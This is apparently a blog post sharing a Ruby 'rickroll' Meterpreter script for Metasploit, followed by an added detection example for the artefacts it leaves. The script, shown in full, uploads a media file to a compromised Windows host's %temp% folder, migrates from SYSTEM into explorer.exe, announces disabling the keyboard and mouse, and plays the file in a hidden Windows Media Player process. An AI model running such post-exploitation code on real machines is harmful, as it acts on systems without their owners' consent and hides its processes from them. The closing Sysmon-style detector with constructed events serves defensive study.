
Rickroll Meterpreter Script

In order to be well prepared for April Fools' Day I decided to put out a rickroll Meterpreter script.

It defaults to looking for rickroll.mp3 in the metasploit framework root directory, but you can use another file with the -f option. I don't parse out the name so you will have to copy it into the metasploit directory.

You can also use any file format supported by Windows Media Player, so you can have it play a wmv (even better). By default the player process is hidden, but you can make it visible with the -v option.

New Features!
And just for added fun, throw in -k to disable the keyboard or -m to disable the mouse, or go all in with -e to disable both the mouse and keyboard and save precious keystrokes.

Here is the file:

Put it in framework3/meterpreter/scripts

# Provided by Tim Medin at timmedin[at]gmail [dot] com
# Uploads the rick roll'ing mp3 and then runs it as a hidden process
# You can also upload a different file (like a wmv video) and have it display -v
# Known Issues: I don't parse the file name provided by -f so make
#   sure the file is in the framework's root directory
# Added disable keyboard and mouse features
# *** Thanks for help from dark operator (Carlos Perez) ***

# Print the usage text and stop the script (called for -h)
def usage
        print_line("Windows Rickroll Meterpreter Script")
        print_line("Usage: rickroll [-h] [-k] [-m] [-e] [-v] [-f <filename>]")
        print_line(@@exec_opts.usage)
        raise Rex::Script::Completed
end

# Option table for Rex::Parser::Arguments; the boolean says whether the
# option takes a value, so -f must be true or val is never filled in
@@exec_opts = Rex::Parser::Arguments.new(
  "-h"  => [ false,  "Help menu."],
  "-f"  => [ true,   "File to upload"],
  "-k"  => [ false,  "Disable Keyboard"],
  "-m"  => [ false,  "Disable Mouse"],
  "-e"  => [ false,  "Disable Keyboard & Mouse"],
  "-v"  => [ false,  "Visible"]
)

rick = "rickroll.mp3"
mediaplayer = "\"C:\\Program Files\\Windows Media Player\\wmplayer.exe\""
visible = false
keyboard = true
mouse = true

@@exec_opts.parse(args) { |opt, idx, val|
        case opt
                when "-k"
                        keyboard = false
                when "-m"
                        mouse = false
                when "-e"
                        keyboard = false
                        mouse = false
                when "-v"
                        visible = true
                when "-f"
                        rick = val
                when "-h"
                        usage
        end
}

session = client

# upload file; keep the extension of the source file so a wmv is played as one
ext = File.extname(rick)
ext = ".mp3" if ext.empty?
print_status("Uploading file #{rick}")
uploadpath = session.fs.file.expand_path("%temp%") + "\\#{rand(100)}#{ext}"
client.fs.file.upload_file(uploadpath, rick)
print_status("Uploaded file to #{uploadpath}")

# SYSTEM has no interactive desktop, so move into the logged-in user's
# explorer.exe before starting the player
go = true
if (session.sys.config.getuid == "NT AUTHORITY\\SYSTEM")
        go = false
        process2mig = "explorer.exe"
        session.sys.process.get_processes().each do |x|
                if (x['name'].downcase == process2mig)
                        print_status("\t#{process2mig} Process found, migrating..")
                        session.core.migrate(x['pid'].to_i)
                        print_status("Migration Successful!!")
                        go = true
                        break
                end
        end
end

if (go)
        if (!mouse)
                print_status("Disabling mouse to extend the pain!")
                # the call that disables the mouse is not included in this listing
        end
        if (!keyboard)
                print_status("Disabling keyboard to extend the pain!")
                # the call that disables the keyboard is not included in this listing
        end
        print_status("Rick rolling!")
        client.sys.process.execute("#{mediaplayer} \"#{uploadpath}\"", nil, {'Hidden' => !visible})
else
        print_status("Need logged in user to execute, cannot find explorer.exe to migrate")
end
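From the other side of the desk, the script above leaves two very recognisable artefacts: a file named with a bare number in %temp% and a wmplayer.exe launch whose only argument is that file. The following detector is an added example, not part of the original post; it runs over constructed Sysmon-style FileCreate and ProcessCreate records, and the field names (EventId, TargetFilename, CommandLine, ParentImage) are assumed to follow Sysmon's schema.

```ruby
# Added detection example: Sysmon's schema is assumed for the field names,
# and the events at the bottom are constructed for this example.

# The script drops %temp%\<rand(100)>.mp3, i.e. a one- or two-digit file name
TEMP_MEDIA = %r{\\temp\\\d{1,2}\.(?:mp3|wmv)\z}i
# ...and then runs: "...\wmplayer.exe" "<that path>" (hidden by default)
PLAYER_CMD = %r{wmplayer\.exe"?\s+"(?<media>[^"]*\\temp\\\d{1,2}\.(?:mp3|wmv))"}i

# Returns one alert per wmplayer launch whose argument is numeric-named media
# in %temp%; a preceding FileCreate for the same path raises confidence.
def detect_rickroll(events)
  dropped = {}   # downcased path of media written to %temp% => creating event
  alerts = []
  events.each do |ev|
    case ev['EventId']
    when 11   # Sysmon FileCreate
      path = ev['TargetFilename'].to_s
      dropped[path.downcase] = ev if path =~ TEMP_MEDIA
    when 1    # Sysmon ProcessCreate
      m = PLAYER_CMD.match(ev['CommandLine'].to_s)
      next unless m
      media = m[:media]
      reason = if dropped.key?(media.downcase)
                 "plays file just dropped in %temp%"
               else
                 "plays numeric-named media from %temp%"
               end
      alerts << { pid: ev['ProcessId'], parent: ev['ParentImage'],
                  media: media, reason: reason }
    end
  end
  alerts
end

# Constructed sample: the drop, the launch it feeds, and a benign WMP launch
SAMPLE_EVENTS = [
  { 'EventId' => 11, 'ProcessId' => 4212, 'Image' => 'C:\\Windows\\explorer.exe',
    'TargetFilename' => 'C:\\Users\\bob\\AppData\\Local\\Temp\\42.mp3' },
  { 'EventId' => 1, 'ProcessId' => 5100, 'ParentImage' => 'C:\\Windows\\explorer.exe',
    'Image' => 'C:\\Program Files\\Windows Media Player\\wmplayer.exe',
    'CommandLine' => '"C:\\Program Files\\Windows Media Player\\wmplayer.exe" ' \
                     '"C:\\Users\\bob\\AppData\\Local\\Temp\\42.mp3"' },
  { 'EventId' => 1, 'ProcessId' => 5200, 'ParentImage' => 'C:\\Windows\\explorer.exe',
    'Image' => 'C:\\Program Files\\Windows Media Player\\wmplayer.exe',
    'CommandLine' => '"C:\\Program Files\\Windows Media Player\\wmplayer.exe" ' \
                     '"C:\\Users\\bob\\Music\\song.mp3"' },
]

if __FILE__ == $0
  detect_rickroll(SAMPLE_EVENTS).each { |a| puts a.inspect }
end
```

The benign launch of a file from the user's Music folder is left alone; only the numeric-named file in %temp% trips the rule, with the stronger reason when the matching FileCreate was seen first.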

